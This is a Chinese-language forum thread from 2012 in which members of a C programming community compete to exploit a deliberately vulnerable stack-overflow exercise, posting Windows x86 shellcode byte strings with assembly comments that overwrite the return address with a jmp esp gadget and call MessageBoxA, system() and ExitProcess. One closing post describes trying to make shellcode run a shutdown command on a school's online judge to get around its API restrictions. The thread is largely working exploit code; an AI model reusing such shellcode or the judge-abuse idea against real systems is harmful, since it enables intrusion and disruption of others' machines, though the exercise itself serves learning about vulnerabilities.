悬赏一百鱼币，大家一起学习C语言溢出漏洞的利用，有木有？！

五月跳回家

shellcode

1. "\x66\x69\x73\x68"//前面填充80个字节栈
   
2. "\x12\x45\xfa\x7f"//jmp esp(原eip)
   
3. "\x33\xDB\x53"//xor ebx,ebx
   
4. "\x68\x63\x6F\x6D\x21"//push    216D6F63
   
5. "\x68\x73\x68\x63\x2E"//push    2E636873
   
6. "\x68\x6F\x5F\x66\x69"//push    69665F6F
   
7. "\x68\x6D\x65\x5F\x74"//push    745F656D
   
8. "\x68\x65\x6C\x63\x6F"//push    6F636C65
   
9. "\x68\x5E\x5F\x5E\x77"//push    775E5F5E;   ascii ^_^welcome_to_fishc.com!
   
10. "\x8B\xC4"//mov     eax, esp
    
11. "\x53"//push    ebx
    
12. "\x50"//push    eax
    
13. "\x50"//push    eax
    
14. "\x53"//push    ebx
    
15. "\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;   我电脑上MessageBoxA的地址
    
16. "\xFF\xD0"//call eax
    
17. "\x53"//push        ebx
    
18. "\xB8\xFA\xCA\x81\x7C"//mov     eax, 7C81CAFA
    
19. "\xFF\xD0";//call eax;      exit(0)

复制代码

五月跳回家

栈溢出了   

五月跳回家

小甲鱼 发表于 2012-8-8 22:49

                               
登录/注册后可看大图

算算难度好像没那么大，所以改200鱼币~

就算shellcode写好了，但有些数字没ASCII码的，如果要表示0x7ffa4512这个地址，用ASCII码怎么表示

五月跳回家

小甲鱼 发表于 2012-8-9 01:55

                               
登录/注册后可看大图

可以用UE在十六进制下编辑即可。

0xfa是一个？，MessageBoxA地址，不同系统不同的吧

五月跳回家

颓废的青春 发表于 2012-8-9 09:02

                               
登录/注册后可看大图

为什么我电脑上不行啊，总是停止运行

不同系统MessageBoxA的地址不同，把那个地址的地方改掉

五月跳回家

小甲鱼 发表于 2012-8-8 22:49

                               
登录/注册后可看大图

算算难度好像没那么大，所以改200鱼币~

200鱼币这活动还有么，我写好了

五月跳回家

小甲鱼 发表于 2012-8-9 15:04

                               
登录/注册后可看大图

哟西，有的，把答案和具体的思路提交下即可哦~真不错~

给shellcode吧

1. char password[]=
   
2. "a\x41\x41\x41"
   
3. "\x66\x69\x73\x68"
   
4. 
   
5. 
   
6. "\x66\x69\x73\x68"//前面填充80个字节栈
   
7. "\x12\x45\xfa\x7f"//jmp esp(原eip)
   
8. //MessageBoxA;
   
9. "\x33\xDB\x53"//xor ebx,ebx
   
10. "\x68\x63\x6F\x6D\x21"//push    216D6F63
    
11. "\x68\x73\x68\x63\x2E"
    
12. "\x68\x6F\x5F\x66\x69"
    
13. "\x68\x6D\x65\x5F\x74"
    
14. "\x68\x65\x6C\x63\x6F"//push    6F636C65
    
15. "\x68\x5E\x5F\x5E\x77"//push    775E5F5E//ascii ^_^welcome_to_fishc.com!
    
16. "\x8B\xC4"//mov     eax, esp
    
17. "\x53"//push    ebx
    
18. "\x50"
    
19. "\x50"//push    eax
    
20. "\x53"
    
21. "\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;我电脑上MessageBoxA的地址
    
22. "\xFF\xD0"//call eax
    
23. //system("start www.fishc.com");
    
24. 
    
25. "\x55"                                        //push    ebp
    
26. "\x8B\xEC"                                //mov     ebp, esp
    
27. "\x83\xEC\x20"                        //sub     esp, 20
    
28. "\xB8\x73\x74\x61\x72"        //mov     eax, 72617473
    
29. "\x89\x45\xE4"                        //mov     dword ptr [ebp-1C], eax
    
30. "\xB8\x74\x20\x77\x77"        //www.fishc.com
    
31. "\x89\x45\xE8"                        
    
32. "\xB8\x77\x2E\x66\x69"        
    
33. "\x89\x45\xEC"                        //....
    
34. "\xB8\x73\x68\x63\x2E"        //....
    
35. "\x89\x45\xF0"                        //....
    
36. "\x66\xC7\x45\xF4\x63\x6F"
    
37. "\xC6\x45\xF6\x6D"
    
38. "\x33\xC0"                                //xor     eax, eax
    
39. "\x88\x45\xF7"                        
    
40. "\x8D\x7D\xE4"                        
    
41. "\x57"                                       
    
42. "\xBA\x77\xB1\x4C\x75"        //system地址
    
43. "\xFF\xD2"                                //call    edx ;
    
44. //ExitProcess(0);
    
45. "\x53"//push        ebx
    
46. "\xB8\xE2\xBB\xAC\x75"//mov     eax,  75ACBBE2   ;ExitProcess
    
47. "\xFF\xD0";                        //call eax;*/

复制代码

五月跳回家

Ｓì曾相識♂ 发表于 2012-8-9 14:39

                               
登录/注册后可看大图

竟然被人抢先了一部，想搞懂这个的，建议出看一下看雪论坛出品的书《0Day安全：软件漏洞分析技术》。甲鱼兄 ...

昨天通宵刷的

五月跳回家

小甲鱼 发表于 2012-8-9 16:39

                               
登录/注册后可看大图

看来还是酱紫的模式比较促进学习哈~

甲鱼哥,我打开那网站使用system("start www.fishc.com");来的，中间有个空格，我那个纠结啊
后来才想到fscanf( fp, "%s", password );来读读到空格就结束了，它就不读了，肏程序崩溃，你把
fscanf( fp, "%s", password );改成fgets(password,1024,fp);吧，就当降低难度

五月跳回家

Tzdner_C 发表于 2012-8-9 17:39

                               
登录/注册后可看大图

可以用 GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA");   把这个也写进文件里面，只是有些麻 ...

LoadLibraryA的地址貌似也不同

五月跳回家

dongrui 发表于 2012-9-23 18:11

                               
登录/注册后可看大图

先是淹没数组，再淹没返回值，接着淹没ebp指针，就是没看懂你代码第一行怎么实现淹没这88个字节，我觉得好 ...

嗯，。写shellcode蛋疼啊:dizzy:，
学校有acm比赛，把代码交到平台上，自动判题，但限制使用api等恶意输入，，
然后我想利用shellcode调用api，获取kernel32基址再->导出表->GetProcAddress->LoadLibrary.......就调用了一个system("shutdown -s -t 60");代码交上去，没用，蛋疼啊